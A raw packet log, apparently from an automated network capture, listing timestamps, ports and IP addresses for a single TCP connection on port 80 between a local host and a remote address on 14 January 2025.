Jan 14, 2025 16:21:09.608670950 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608680964 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608688116 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608709097 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608731031 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608822107 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608834028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608844995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608855963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608865976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608876944 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608886957 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608900070 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608900070 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608903885 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608913898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608913898 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608926058 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608936071 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608937025 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608947039 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608952999 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608958960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608969927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608975887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.608980894 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.608993053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609003067 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609014034 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609025002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609035969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609045982 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609050989 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609050989 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609050989 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609057903 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609067917 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609072924 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609097958 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609750986 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609762907 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609774113 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609783888 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609793901 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609805107 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609808922 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609816074 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609823942 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609826088 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609838009 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609848022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609853029 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609865904 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609877110 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609886885 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609888077 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609899044 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609909058 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609913111 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609920979 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609930992 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609942913 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609947920 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609954119 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609965086 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.609966040 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609977007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609987974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.609997988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610001087 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610008955 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610018969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610021114 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610032082 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610043049 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610047102 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610052109 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610076904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610096931 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610769033 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610780954 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610790968 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610807896 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610814095 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610819101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610829115 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610833883 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610840082 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610852003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610862017 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610862017 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610872984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610879898 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610884905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610896111 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610905886 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610908985 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610915899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610925913 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610928059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610937119 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610946894 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610950947 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610959053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610970020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610975981 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.610981941 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610992908 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.610996962 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.611012936 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.611038923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.611183882 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611195087 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611206055 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611217022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611227989 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.611227989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611238956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611247063 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.611251116 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.611270905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.611294031 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.674870014 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.679766893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.679805040 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.679816008 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.679828882 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.679836988 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.679856062 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.679878950 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.679886103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.679898977 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.679934025 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680010080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680022001 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680032969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680043936 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680054903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680078030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680082083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680089951 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680102110 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680120945 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680143118 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680177927 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680190086 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680201054 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680227041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680243969 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680321932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680334091 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680344105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680356026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680366993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680367947 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680387020 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680399895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680407047 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680412054 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680423021 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680438995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680444956 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680450916 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680461884 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680466890 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680473089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680485010 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680486917 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680859089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680871010 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680881977 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680886984 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680892944 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680900097 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680903912 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680918932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680929899 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680931091 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680941105 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680942059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680957079 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680969000 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.680969954 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680979967 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.680982113 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681003094 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681027889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681184053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681195974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681207895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681220055 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681229115 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681231976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681242943 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681252956 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681255102 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681267023 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681278944 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681281090 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681291103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681299925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681318998 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681339025 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681339025 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681351900 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681380987 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681407928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681418896 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681431055 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681437016 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681442976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681453943 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681463003 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681464911 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681476116 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681483984 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681488037 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681498051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681504965 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681510925 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.681530952 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.681545019 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682066917 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682079077 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682090044 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682101965 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682107925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682111979 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682122946 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682130098 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682137012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682147980 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682151079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682157993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682168961 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682168961 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682187080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682192087 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682197094 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682208061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682218075 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682221889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682229996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682240963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682246923 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682255030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682265043 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682267904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682276964 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682286978 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682287931 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682297945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682307005 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682307959 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682321072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682329893 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682332039 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682343006 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682349920 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682353973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682365894 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.682368040 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682391882 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.682408094 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683067083 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683079004 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683089018 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683099985 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683109999 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683114052 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683120012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683130980 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683135033 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683141947 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683155060 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683159113 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683170080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683176041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683182001 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683192015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683197975 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683202028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683213949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683223009 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683223963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683235884 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683245897 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683245897 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683259010 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683268070 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683269978 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683279991 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683291912 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683294058 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683304071 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683324099 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683329105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683336973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683342934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683353901 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683358908 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683367014 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683381081 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683397055 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683737993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683748960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683758974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683769941 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683779955 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683800936 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683898926 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683911085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683921099 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683932066 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683940887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683942080 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683954954 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683963060 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683970928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683981895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.683986902 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.683993101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684004068 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684010029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684020996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684029102 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684031963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684042931 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684053898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684056044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684065104 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684076071 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684077978 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684086084 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684097052 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684102058 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684109926 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684117079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:09.684120893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:09.684133053 CET	80	49165	45.155.249.215	192.168.2.22
